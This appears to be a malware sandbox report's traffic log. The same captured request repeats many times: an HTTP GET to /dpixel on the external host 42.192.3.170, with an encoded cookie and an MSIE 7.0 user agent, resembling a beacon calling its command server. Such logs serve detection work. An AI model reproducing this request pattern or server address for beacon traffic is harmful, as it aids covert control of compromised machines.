          Source: global trafficHTTP traffic detected: GET /dpixel HTTP/1.1Accept: */*Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)Host: 42.192.3.170Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /dpixel HTTP/1.1Accept: */*Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)Host: 42.192.3.170Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /dpixel HTTP/1.1Accept: */*Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)Host: 42.192.3.170Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /dpixel HTTP/1.1Accept: */*Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)Host: 42.192.3.170Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /dpixel HTTP/1.1Accept: */*Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)Host: 42.192.3.170Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /dpixel HTTP/1.1Accept: */*Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)Host: 42.192.3.170Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /dpixel HTTP/1.1Accept: */*Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)Host: 42.192.3.170Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /dpixel HTTP/1.1Accept: */*Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)Host: 42.192.3.170Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /dpixel HTTP/1.1Accept: */*Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)Host: 42.192.3.170Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /dpixel HTTP/1.1Accept: */*Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)Host: 42.192.3.170Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /dpixel HTTP/1.1Accept: */*Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)Host: 42.192.3.170Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /dpixel HTTP/1.1Accept: */*Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)Host: 42.192.3.170Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /dpixel HTTP/1.1Accept: */*Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)Host: 42.192.3.170Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /dpixel HTTP/1.1Accept: */*Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)Host: 42.192.3.170Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /dpixel HTTP/1.1Accept: */*Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)Host: 42.192.3.170Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /dpixel HTTP/1.1Accept: */*Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)Host: 42.192.3.170Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /dpixel HTTP/1.1Accept: */*Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)Host: 42.192.3.170Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /dpixel HTTP/1.1Accept: */*Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)Host: 42.192.3.170Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /dpixel HTTP/1.1Accept: */*Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)Host: 42.192.3.170Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /dpixel HTTP/1.1Accept: */*Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)Host: 42.192.3.170Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /dpixel HTTP/1.1Accept: */*Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)Host: 42.192.3.170Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /dpixel HTTP/1.1Accept: */*Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)Host: 42.192.3.170Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /dpixel HTTP/1.1Accept: */*Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)Host: 42.192.3.170Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /dpixel HTTP/1.1Accept: */*Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)Host: 42.192.3.170Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /dpixel HTTP/1.1Accept: */*Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)Host: 42.192.3.170Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /dpixel HTTP/1.1Accept: */*Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)Host: 42.192.3.170Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /dpixel HTTP/1.1Accept: */*Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)Host: 42.192.3.170Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /dpixel HTTP/1.1Accept: */*Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)Host: 42.192.3.170Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /dpixel HTTP/1.1Accept: */*Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)Host: 42.192.3.170Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /dpixel HTTP/1.1Accept: */*Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)Host: 42.192.3.170Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /dpixel HTTP/1.1Accept: */*Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)Host: 42.192.3.170Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /dpixel HTTP/1.1Accept: */*Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)Host: 42.192.3.170Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /dpixel HTTP/1.1Accept: */*Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)Host: 42.192.3.170Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /dpixel HTTP/1.1Accept: */*Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)Host: 42.192.3.170Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /dpixel HTTP/1.1Accept: */*Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)Host: 42.192.3.170Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /dpixel HTTP/1.1Accept: */*Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)Host: 42.192.3.170Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /dpixel HTTP/1.1Accept: */*Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)Host: 42.192.3.170Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /dpixel HTTP/1.1Accept: */*Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)Host: 42.192.3.170Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /dpixel HTTP/1.1Accept: */*Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)Host: 42.192.3.170Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /dpixel HTTP/1.1Accept: */*Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)Host: 42.192.3.170Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /dpixel HTTP/1.1Accept: */*Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)Host: 42.192.3.170Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /dpixel HTTP/1.1Accept: */*Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)Host: 42.192.3.170Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /dpixel HTTP/1.1Accept: */*Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)Host: 42.192.3.170Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /dpixel HTTP/1.1Accept: */*Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)Host: 42.192.3.170Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /dpixel HTTP/1.1Accept: */*Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)Host: 42.192.3.170Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /dpixel HTTP/1.1Accept: */*Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)Host: 42.192.3.170Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /dpixel HTTP/1.1Accept: */*Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)Host: 42.192.3.170Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /dpixel HTTP/1.1Accept: */*Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)Host: 42.192.3.170Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /dpixel HTTP/1.1Accept: */*Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)Host: 42.192.3.170Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /dpixel HTTP/1.1Accept: */*Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)Host: 42.192.3.170Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /dpixel HTTP/1.1Accept: */*Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)Host: 42.192.3.170Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /dpixel HTTP/1.1Accept: */*Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)Host: 42.192.3.170Connection: Keep-AliveCache-Control: no-cache
